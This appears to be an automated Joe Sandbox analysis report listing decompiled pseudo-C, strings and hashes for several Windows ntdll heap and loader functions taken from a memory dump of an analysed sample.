                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010C9C28
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 2994545307-1948996284
                                                                                                            • Opcode ID: 36cb8a50f83cfa0ca9a605d126cb89a1348e66cb0daa733a1372191ec401531b
                                                                                                            • Instruction ID: 0a268af490416f1e63ae5cec32c268bdb93b39e00702c1424133ce81c6ff0ff2
                                                                                                            • Opcode Fuzzy Hash: 36cb8a50f83cfa0ca9a605d126cb89a1348e66cb0daa733a1372191ec401531b
                                                                                                            • Instruction Fuzzy Hash: E491F471E0020ADFDB98DF59D4C4ABEBBF5FF44314B4881AAD985AB141D730E941CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E0109AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E010BD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1158a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E010A96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01113C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E010A96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0106B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E011214FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01087D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01121411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01087D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01121411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                            0x0109ac85
                                                                                                            0x0109ac88
                                                                                                            0x0109ac8a
                                                                                                            0x0109ac8d
                                                                                                            0x0109ac91
                                                                                                            0x0109ac99
                                                                                                            0x0109ac9c
                                                                                                            0x010d9f57
                                                                                                            0x010d9f5b
                                                                                                            0x010d9f60
                                                                                                            0x010d9f60
                                                                                                            0x0109aca8
                                                                                                            0x0109acae
                                                                                                            0x0109acda
                                                                                                            0x0109acde
                                                                                                            0x0109ace8
                                                                                                            0x0109aceb
                                                                                                            0x0109acee
                                                                                                            0x00000000
                                                                                                            0x0109acee
                                                                                                            0x0109acf6
                                                                                                            0x0109acb0
                                                                                                            0x0109acb0
                                                                                                            0x0109acbb
                                                                                                            0x0109acbd
                                                                                                            0x0109acc0
                                                                                                            0x0109acc5
                                                                                                            0x0109adae
                                                                                                            0x0109adb4
                                                                                                            0x0109adb4
                                                                                                            0x0109acd4
                                                                                                            0x0109acd8
                                                                                                            0x0109acf9
                                                                                                            0x0109acff
                                                                                                            0x0109ad04
                                                                                                            0x0109ad08
                                                                                                            0x0109ad09
                                                                                                            0x0109ad10
                                                                                                            0x0109ad12
                                                                                                            0x0109ad18
                                                                                                            0x010d9f6f
                                                                                                            0x010d9f74
                                                                                                            0x010d9f76
                                                                                                            0x010d9f7c
                                                                                                            0x010d9f84
                                                                                                            0x010d9f88
                                                                                                            0x010d9f89
                                                                                                            0x010d9f90
                                                                                                            0x010d9f90
                                                                                                            0x010d9f76
                                                                                                            0x0109ad1e
                                                                                                            0x0109ad24
                                                                                                            0x0109ad26
                                                                                                            0x010da097
                                                                                                            0x010da09b
                                                                                                            0x010da0ba
                                                                                                            0x010da0bf
                                                                                                            0x010da09d
                                                                                                            0x010da0b2
                                                                                                            0x010da0b7
                                                                                                            0x010da0c5
                                                                                                            0x010da0c8
                                                                                                            0x010da0cb
                                                                                                            0x010da0d2
                                                                                                            0x00000000
                                                                                                            0x0109ad2c
                                                                                                            0x0109ad2c
                                                                                                            0x0109ad2f
                                                                                                            0x0109ad34
                                                                                                            0x0109ad36
                                                                                                            0x010d9f97
                                                                                                            0x010d9f9a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d9fa9
                                                                                                            0x0109ad3e
                                                                                                            0x0109ad3e
                                                                                                            0x0109ad41
                                                                                                            0x010d9fb3
                                                                                                            0x010d9fb9
                                                                                                            0x010d9fc0
                                                                                                            0x010d9fd0
                                                                                                            0x010d9fd0
                                                                                                            0x010d9fc0
                                                                                                            0x0109ad4a
                                                                                                            0x0109ad50
                                                                                                            0x0109ad5c
                                                                                                            0x0109ad62
                                                                                                            0x0109ad68
                                                                                                            0x0109ad6b
                                                                                                            0x0109ad6d
                                                                                                            0x010d9fda
                                                                                                            0x010d9fdd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d9fec
                                                                                                            0x00000000
                                                                                                            0x0109ad73
                                                                                                            0x0109ad73
                                                                                                            0x0109ad73
                                                                                                            0x0109ad75
                                                                                                            0x0109ad75
                                                                                                            0x0109ad78
                                                                                                            0x010d9ff6
                                                                                                            0x010d9ffc
                                                                                                            0x010da003
                                                                                                            0x010da00e
                                                                                                            0x010da010
                                                                                                            0x010da01b
                                                                                                            0x010da01b
                                                                                                            0x010da01b
                                                                                                            0x010da038
                                                                                                            0x010da038
                                                                                                            0x010da003
                                                                                                            0x0109ad84
                                                                                                            0x0109ad89
                                                                                                            0x0109ad8c
                                                                                                            0x0109ad8e
                                                                                                            0x010da042
                                                                                                            0x010da045
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010da054
                                                                                                            0x00000000
                                                                                                            0x0109ad94
                                                                                                            0x0109ad94
                                                                                                            0x0109ad94
                                                                                                            0x0109ad96
                                                                                                            0x0109ad96
                                                                                                            0x0109ad99
                                                                                                            0x010da063
                                                                                                            0x010da065
                                                                                                            0x010da070
                                                                                                            0x010da070
                                                                                                            0x010da070
                                                                                                            0x010da08d
                                                                                                            0x010da08d
                                                                                                            0x0109ada4
                                                                                                            0x0109ada6
                                                                                                            0x00000000
                                                                                                            0x0109ada6
                                                                                                            0x0109ad8e
                                                                                                            0x0109ad6d
                                                                                                            0x0109ad3c
                                                                                                            0x0109ad3c
                                                                                                            0x00000000
                                                                                                            0x0109ad3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109acd8

                                                                                                            Strings
                                                                                                            • HEAP: , xrefs: 010DA0BA
                                                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 010DA0CD
                                                                                                            • HEAP[%wZ]: , xrefs: 010DA0AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                            • API String ID: 0-1340214556
                                                                                                            • Opcode ID: 807ef5167f5a68d0471619a869d52aba3ee86900ef2e0f5184bb914f2ebe684e
                                                                                                            • Instruction ID: 2d178d28d07bdda20a37f61bc276fe57d71e8c58c97678d33ac3546cd07e41af
                                                                                                            • Opcode Fuzzy Hash: 807ef5167f5a68d0471619a869d52aba3ee86900ef2e0f5184bb914f2ebe684e
                                                                                                            • Instruction Fuzzy Hash: 1781E471305684EFEB26DBA8C894BAABBF8FF04714F0441E5E5D28B692D774E940DB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0108B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0112A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1158748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0106B150();
					__eflags =  *0x1157bc8;
					if(__eflags == 0) {
						E01122073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0112A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1158720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1158720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0108B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0112A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0108E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                            0x0108b746
                                                                                                            0x0108b74b
                                                                                                            0x0108b74d
                                                                                                            0x0108b750
                                                                                                            0x0108b755
                                                                                                            0x0108b758
                                                                                                            0x0108b758
                                                                                                            0x0108b75e
                                                                                                            0x0108b763
                                                                                                            0x0108b764
                                                                                                            0x0108b76a
                                                                                                            0x0108b76d
                                                                                                            0x0108b771
                                                                                                            0x0108b776
                                                                                                            0x0108b85c
                                                                                                            0x0108b85d
                                                                                                            0x0108b860
                                                                                                            0x0108b865
                                                                                                            0x010d2ba1
                                                                                                            0x010d2ba2
                                                                                                            0x010d2ba9
                                                                                                            0x010d2bae
                                                                                                            0x010d2bae
                                                                                                            0x0108b77c
                                                                                                            0x0108b77c
                                                                                                            0x0108b77c
                                                                                                            0x0108b785
                                                                                                            0x0108b788
                                                                                                            0x010d2bb6
                                                                                                            0x010d2bb9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2bbf
                                                                                                            0x010d2bc5
                                                                                                            0x010d2bc9
                                                                                                            0x010d2be8
                                                                                                            0x010d2bed
                                                                                                            0x010d2bcb
                                                                                                            0x010d2be0
                                                                                                            0x010d2be5
                                                                                                            0x010d2bf3
                                                                                                            0x010d2bf8
                                                                                                            0x010d2bfd
                                                                                                            0x010d2c05
                                                                                                            0x010d2c0e
                                                                                                            0x010d2c0e
                                                                                                            0x00000000
                                                                                                            0x0108b78e
                                                                                                            0x0108b78e
                                                                                                            0x0108b78e
                                                                                                            0x0108b791
                                                                                                            0x0108b791
                                                                                                            0x0108b797
                                                                                                            0x0108b797
                                                                                                            0x0108b79f
                                                                                                            0x0108b7a9
                                                                                                            0x0108b7af
                                                                                                            0x0108b7af
                                                                                                            0x0108b7b1
                                                                                                            0x0108b7b6
                                                                                                            0x0108b7e2
                                                                                                            0x0108b7e2
                                                                                                            0x0108b7e7
                                                                                                            0x0108b880
                                                                                                            0x0108b7ed
                                                                                                            0x0108b7ed
                                                                                                            0x0108b7ed
                                                                                                            0x0108b7ef
                                                                                                            0x0108b7f2
                                                                                                            0x0108b7f2
                                                                                                            0x0108b7f5
                                                                                                            0x0108b7fa
                                                                                                            0x010d2c2d
                                                                                                            0x010d2c2e
                                                                                                            0x010d2c39
                                                                                                            0x0108b800
                                                                                                            0x0108b800
                                                                                                            0x0108b802
                                                                                                            0x0108b805
                                                                                                            0x0108b808
                                                                                                            0x0108b808
                                                                                                            0x0108b80a
                                                                                                            0x0108b80d
                                                                                                            0x0108b816
                                                                                                            0x0108b81c
                                                                                                            0x0108b822
                                                                                                            0x0108b82f
                                                                                                            0x0108b88b
                                                                                                            0x0108b892
                                                                                                            0x0108b897
                                                                                                            0x0108b899
                                                                                                            0x0108b89b
                                                                                                            0x0108b89e
                                                                                                            0x0108b8a5
                                                                                                            0x0108b8a8
                                                                                                            0x0108b8aa
                                                                                                            0x0108b8ac
                                                                                                            0x0108b8ac
                                                                                                            0x0108b8aa
                                                                                                            0x0108b892
                                                                                                            0x0108b831
                                                                                                            0x0108b839
                                                                                                            0x0108b83b
                                                                                                            0x0108b83b
                                                                                                            0x0108b844
                                                                                                            0x0108b84b
                                                                                                            0x0108b852
                                                                                                            0x0108b7b8
                                                                                                            0x0108b7ba
                                                                                                            0x0108b7bf
                                                                                                            0x0108b7c4
                                                                                                            0x010d2c18
                                                                                                            0x010d2c19
                                                                                                            0x010d2c23
                                                                                                            0x0108b7ca
                                                                                                            0x0108b7ca
                                                                                                            0x0108b7cc
                                                                                                            0x0108b7cf
                                                                                                            0x0108b7d1
                                                                                                            0x0108b7d1
                                                                                                            0x0108b7d4
                                                                                                            0x0108b7dc
                                                                                                            0x0108b8bb
                                                                                                            0x0108b8bb
                                                                                                            0x0108b8be
                                                                                                            0x0108b8be
                                                                                                            0x0108b8c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108b8c3
                                                                                                            0x0108b8c5
                                                                                                            0x0108b8c7
                                                                                                            0x0108b8e0
                                                                                                            0x00000000
                                                                                                            0x0108b8e0
                                                                                                            0x0108b8cc
                                                                                                            0x0108b8cc
                                                                                                            0x00000000
                                                                                                            0x0108b8cc
                                                                                                            0x0108b8d6
                                                                                                            0x0108b8d6
                                                                                                            0x00000000
                                                                                                            0x0108b7dc
                                                                                                            0x0108b7b6

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                            • API String ID: 0-1334570610
                                                                                                            • Opcode ID: fc9a5883f4ce58843cab5c9693e7f3a41e395829a76a9be45501f94ecc53391b
                                                                                                            • Instruction ID: fa3195930594dd156b606c66534de96cfdee69a449748874a892d65b688f1c7e
                                                                                                            • Opcode Fuzzy Hash: fc9a5883f4ce58843cab5c9693e7f3a41e395829a76a9be45501f94ecc53391b
                                                                                                            • Instruction Fuzzy Hash: C461C070614301DFDB69EF28C484B6ABBE5FF44314F1885A9E8D98B242D770E891CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01077E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E01077E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0107CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0106C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1155780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E010E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1155780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01087D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01087D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E010E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01087D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01087D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E010E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0109A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0106B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                            0x01077e4c
                                                                                                            0x01077e50
                                                                                                            0x01077e55
                                                                                                            0x01077e58
                                                                                                            0x01077e5d
                                                                                                            0x01077e71
                                                                                                            0x01077f33
                                                                                                            0x01077e77
                                                                                                            0x01077e77
                                                                                                            0x01077e79
                                                                                                            0x01077e79
                                                                                                            0x01077e7e
                                                                                                            0x01077f45
                                                                                                            0x010c9848
                                                                                                            0x00000000
                                                                                                            0x010c9848
                                                                                                            0x01077f4e
                                                                                                            0x01077f53
                                                                                                            0x01077f5a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c985a
                                                                                                            0x010c9862
                                                                                                            0x010c9866
                                                                                                            0x00000000
                                                                                                            0x010c986c
                                                                                                            0x00000000
                                                                                                            0x010c986c
                                                                                                            0x01077e84
                                                                                                            0x01077e84
                                                                                                            0x01077e8d
                                                                                                            0x010c9871
                                                                                                            0x01077eb8
                                                                                                            0x01077ec0
                                                                                                            0x01077ec0
                                                                                                            0x01077e9a
                                                                                                            0x010c987e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c9884
                                                                                                            0x010c988b
                                                                                                            0x010c98a7
                                                                                                            0x010c98ac
                                                                                                            0x010c98b1
                                                                                                            0x010c98b6
                                                                                                            0x010c98b8
                                                                                                            0x010c98b8
                                                                                                            0x010c98b9
                                                                                                            0x00000000
                                                                                                            0x010c98b9
                                                                                                            0x01077ea0
                                                                                                            0x01077ea7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01077eac
                                                                                                            0x01077eb1
                                                                                                            0x01077ec6
                                                                                                            0x01077ed0
                                                                                                            0x010c98cc
                                                                                                            0x01077ed6
                                                                                                            0x01077ed6
                                                                                                            0x01077ed6
                                                                                                            0x01077ede
                                                                                                            0x01077ee3
                                                                                                            0x010c98e3
                                                                                                            0x010c98f0
                                                                                                            0x010c9902
                                                                                                            0x010c98f2
